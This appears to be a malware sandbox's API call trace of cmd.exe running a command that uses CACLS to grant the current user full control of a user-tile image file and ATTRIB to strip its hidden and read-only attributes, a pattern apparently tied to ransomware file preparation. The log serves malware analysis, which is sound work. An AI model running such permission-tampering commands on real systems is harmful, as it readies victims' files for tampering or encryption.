[0188.611] RegCloseKey (hKey=0x40) returned 0x0 [0188.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae98c | out: phkResult=0x1ae98c*=0x40) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x0, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x9, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x9, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x9, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegCloseKey (hKey=0x40) returned 0x0 [0188.611] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886396 [0188.611] srand (_Seed=0x5b886396) [0188.611] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" [0188.611] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" [0188.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.611] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0188.612] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.612] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.612] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.612] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0188.612] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0188.612] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0188.612] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0188.612] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0188.612] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0188.612] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0188.612] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0188.612] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0188.612] GetEnvironmentStringsW () returned 0x302458* [0188.612] FreeEnvironmentStringsW (penv=0x302458) returned 1 [0188.612] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.612] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.612] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0188.612] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0188.612] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0188.612] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0188.612] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0188.612] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0188.612] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0188.612] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0188.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af758 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.612] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af758, lpFilePart=0x1af754 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af754*="Desktop") returned 0x18 [0188.612] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.613] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4d4 | out: lpFindFileData=0x1af4d4) returned 0x300ae8 [0188.613] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0188.613] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4d4 | out: lpFindFileData=0x1af4d4) returned 0x300ae8 [0188.613] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0188.613] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4d4 | out: lpFindFileData=0x1af4d4) returned 0x300ae8 [0188.613] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0188.613] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.613] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0188.613] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0188.613] GetEnvironmentStringsW () returned 0x300308* [0188.613] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.613] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.614] GetConsoleOutputCP () returned 0x1b5 [0188.614] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.614] GetUserDefaultLCID () returned 0x409 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af898, cchData=128 | out: lpLCData="0") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af898, cchData=128 | out: lpLCData="0") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af898, cchData=128 | out: lpLCData="1") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0188.615] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0188.616] GetConsoleTitleW (in: lpConsoleTitle=0x2f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.616] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.616] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0188.616] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0188.616] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0188.617] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0188.617] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0188.617] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0188.617] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0188.617] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0188.617] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0188.617] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0188.617] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0188.620] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0188.620] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0188.620] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0188.620] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0188.620] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0188.620] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0188.620] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0188.622] GetConsoleTitleW (in: lpConsoleTitle=0x1af52c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.622] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.622] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.622] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.622] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.622] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.622] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.622] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.622] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.622] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.622] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.622] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.622] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.622] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.622] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.622] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.622] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.622] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.622] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.622] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.622] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.622] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.622] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.622] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.622] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.622] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.622] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.623] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.623] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.623] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.623] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.623] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.623] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.623] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.623] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.623] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.623] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.623] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.623] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.623] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.623] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.623] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.624] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.624] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.624] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.624] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.624] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0188.624] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0188.624] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0188.624] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0188.624] SetErrorMode (uMode=0x0) returned 0x0 [0188.624] SetErrorMode (uMode=0x1) returned 0x0 [0188.624] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x301e98, lpFilePart=0x1af04c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af04c*="Desktop") returned 0x18 [0188.624] SetErrorMode (uMode=0x0) returned 0x1 [0188.624] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.625] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.654] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.654] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.655] GetLastError () returned 0x2 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.655] GetLastError () returned 0x2 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x302180 [0188.655] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.655] GetLastError () returned 0x2 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x302180 [0188.655] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0188.655] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.655] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.655] GetConsoleTitleW (in: lpConsoleTitle=0x1af2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.656] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af148, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af210 | out: lpAttributeList=0x1af148, lpSize=0x1af210) returned 1 [0188.656] UpdateProcThreadAttribute (in: lpAttributeList=0x1af148, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af208, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af148, lpPreviousValue=0x0) returned 1 [0188.656] GetStartupInfoW (in: lpStartupInfo=0x1af104 | out: lpStartupInfo=0x1af104*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.656] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.657] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1f0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1af1f0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x7dc, dwThreadId=0x8a0)) returned 1 [0188.659] CloseHandle (hObject=0x4c) returned 1 [0188.659] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.659] GetEnvironmentStringsW () returned 0x300308* [0188.659] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.659] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0188.847] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af0e4 | out: lpExitCode=0x1af0e4*=0x0) returned 1 [0188.847] CloseHandle (hObject=0x50) returned 1 [0188.847] _vsnwprintf (in: _Buffer=0x1af22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0f0 | out: _Buffer="00000000") returned 8 [0188.847] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.848] GetEnvironmentStringsW () returned 0x302410* [0188.848] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0188.848] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.848] GetEnvironmentStringsW () returned 0x302410* [0188.848] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0188.848] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af148 | out: lpAttributeList=0x1af148) [0188.848] GetConsoleTitleW (in: lpConsoleTitle=0x1af52c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.848] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.848] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.848] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.848] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.849] GetLastError () returned 0x2 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.849] GetLastError () returned 0x2 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x2fe4d8 [0188.849] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.849] GetLastError () returned 0x2 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x2fe4d8 [0188.849] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0188.849] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.849] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.849] GetConsoleTitleW (in: lpConsoleTitle=0x1af2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.849] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af148, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af210 | out: lpAttributeList=0x1af148, lpSize=0x1af210) returned 1 [0188.849] UpdateProcThreadAttribute (in: lpAttributeList=0x1af148, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af208, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af148, lpPreviousValue=0x0) returned 1 [0188.850] GetStartupInfoW (in: lpStartupInfo=0x1af104 | out: lpStartupInfo=0x1af104*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.850] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.850] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 